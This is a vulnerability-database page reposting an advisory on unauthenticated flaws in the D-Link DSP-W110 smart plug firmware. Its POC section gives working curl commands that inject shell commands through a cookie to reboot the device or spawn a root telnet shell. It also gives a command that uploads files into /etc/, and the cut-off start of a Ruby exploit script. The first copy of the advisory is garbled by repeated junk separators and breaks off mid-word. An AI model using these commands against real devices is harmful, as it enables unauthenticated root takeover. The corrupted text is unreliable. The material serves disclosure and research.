D-Link DSP-W110 Command Execution / SQL Injection / File Upload

29   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1316
CVE编号:
漏洞类型: -
漏洞来源: cxs
发布日期: 2015-06-12
CVSS
CVSS值: -
严重级别: 高危
利用范围: -
攻击复杂度: -
认证级别: -
漏洞描述

WLB-2015060066[***]http://cxsecurity.com/issue/WLB-2015060066[***]D-Link DSP-W110 Command Execution / SQL Injection / File Upload[***]2015.06.12[***] Peter Adkins[***] High[***]CWE-89 @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********CWE-264 @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********CWE-78 @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]N/A[***]No[***]Yes[***][***][***][***][***][***][***][***][***]>> D-Link DSP-W110 - multiple vulnerabilities@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Discovered by:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Peter Adkins <peter.adkins@kernelpicnic.net>@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Access:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Local network; unauthenticated access.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Tracking and identifiers:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** CVE - None allocated.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Platforms / Firmware confirmed affected:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** D-Link DSP-W110 (Rev A) - v1.05b01@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Notes:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** * There appears to be a number of references to both 'miiiCasa' as well as@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 'fitivision' throughout the firmware, which may indicate that these@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** vulnerabilities could be present in other devices not listed in this@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** document.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** * A copy of this document, as well as the proof of concept below and a@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** more detailed write-up has been made available via GitHub:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** * https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Arbitrary command execution / SQL Injection@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Patches made to lighttpd by the vendor exposes the device to both SQL@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** injection, and more interestingly, arbitrary code execution. This is due to@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** the improper sanitization of data supplied by a client.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** As the lighttpd service provides endpoints to be accessed without@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** authentication, it provides a v

POC

>> D-Link DSP-W110 - multiple vulnerabilities ---- Discovered by: ---- Peter Adkins <peter.adkins@kernelpicnic.net> ---- Access: ---- Local network; unauthenticated access. ---- Tracking and identifiers: ---- CVE - None allocated. ---- Platforms / Firmware confirmed affected: ---- D-Link DSP-W110 (Rev A) - v1.05b01 ---- Notes: ---- * There appears to be a number of references to both 'miiiCasa' as well as 'fitivision' throughout the firmware, which may indicate that these vulnerabilities could be present in other devices not listed in this document. * A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub: * https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110 ---- Arbitrary command execution / SQL Injection ---- Patches made to lighttpd by the vendor exposes the device to both SQL injection, and more interestingly, arbitrary code execution. This is due to the improper sanitization of data supplied by a client. As the lighttpd service provides endpoints to be accessed without authentication, it provides a vector for an attacker to execute arbitrary commands on the device as the root user via HTTP call without authentication credentials. The root cause of this issue is that the contents of an HTTP Cookie, with any name, is passed verbatim to a sprintf() call in order to form an SQL query used to validate existing client sessions. By simply performing an HTTP request against the device with a correctly formatted cookie set, arbitrary SQL can be executed against the internal SQLite database. Further to this issue, as this SQL query is passed to a popen() call in order to execute the query, arbitrary commands are also able to be run on the device as the root user. This said, due to the length of the allocated buffer, the value of the cookie cannot exceed 19 characters. However, as below, 19 characters is exactly enough to pop a shell on the device. # Reboot the device. curl 192.168.1.3/ --cookie "terribleness='`reboot`" # Spawn a root shell (telnet) curl 192.168.1.3/ --cookie "terribleness=`telnetd -l/bin/sh`" ---- Arbitrary file upload ---- Patches made to lighttpd by the vendor exposes the device to arbitrary file upload attacks. Unfortunately, the only 'filtering' on this resources appears to be a sprintf() call which statically prefixes a submitted 'dev' argument with '/www'. However, if a HTTP request is performed without a 'dev' argument at all, the sprintf() call is never reached, and a fully-qualified path can be provided in the 'path' parameter - bypassing the upload path restriction. As a result of the above, this resource can be used to upload files to any location on the filesystem of devices running vulnerable firmware versions without authentication. # Upload arbitrary files to the device. echo 'Some String' > test.txt curl -X POST -i -F name=@test.txt --http1.0 '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/' ---- Diagnostic Information ---- Patches made to lighttpd by the vendor of this device allows an attacker to query the device, without authentication, for the following information: * Current WLAN SSIDs * Current WLAN channels * LAN and WAN MAC addressing * Current firmware version information * Hardware version information Although not sensitive information, it may allow for identification of devices running vulnerable firmware versions. # Information query. curl 192.168.1.3/mplist.txt ---- Ruby PoC ---- # DSP-W110-Lighttpd PoC. require 'pp' require 'optparse' require 'restclient' # Set defaults and parse command line arguments options = {} options[:addr] = "192.168.0.60" options[:port] = 80 OptionParser.new do |option| option.on("--address [ADDRESS]", "Destination hostname or IP") do |a| options[:addr] = a end option.on("--port [PORT]", "Destination TCP port") do |p| options[:port] = p end option.parse! end # Define which actions we will be using. actions = [ { :name => "Get device information", :call => "txt_parser", :path => "mplist.txt", }, { :name => "Snatch con